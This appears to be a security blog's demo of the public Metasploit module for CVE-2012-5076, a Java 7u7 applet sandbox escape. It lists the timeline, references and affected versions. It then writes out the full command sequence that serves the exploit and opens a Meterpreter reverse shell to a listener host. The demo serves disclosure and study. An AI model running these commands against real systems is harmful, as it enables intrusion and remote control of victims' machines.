Timeline :
Vulnerability patched by Oracle in 2012 October CPU
Vulnerability discovered exploited in the wild by @kafeine the 2012-11-09
Metasploit PoC provided by juan vazquez the 2012-11-11
PoC provided by :
Unknown
juan vazquez
Reference(s) :
CVE-2012-5076
OSVDB-86363
BID-56054
Oracle October 2012 CPU
Cool EK : “Hello my friend…”
Affected version(s) :
Java 1.7.0_07-b10 and earlier
Tested on Windows XP Pro SP3 with :
Java 1.7.0_07-b10
Description :
This module abuses the JAX-WS classes from a Java Applet to run arbitrary Java code outside of the sandbox as exploited in the wild in November of 2012. The vulnerability affects Java version 7u7 and earlier.
Commands :
use exploit/multi/browser/java_jre17_jaxws set SRVHOST 192.168.178.26 set TARGET 1 set PAYLOAD windows/meterpreter/reverse_tcp set LHOST 192.168.178.26 exploit sessions -i 1 getuid sysinfo
Does it work on Windows 7? I tried 7U7 on Win7X64 but it doesn’t seem to work.
RT @eromang: CVE-2012-5076 #Oracle #Java #Applet JAX-WS Remote Code Execution #Metasploit Demo http://t.co/ffg1WG8N #infosec
RT @eromang: CVE-2012-5076 #Oracle #Java #Applet JAX-WS Remote Code Execution #Metasploit Demo http://t.co/ffg1WG8N #infosec
RT @eromang: CVE-2012-5076 #Oracle #Java #Applet JAX-WS Remote Code Execution #Metasploit Demo http://t.co/ffg1WG8N #infosec
RT @eromang: CVE-2012-5076 #Oracle #Java #Applet JAX-WS Remote Code Execution #Metasploit Demo http://t.co/ffg1WG8N #infosec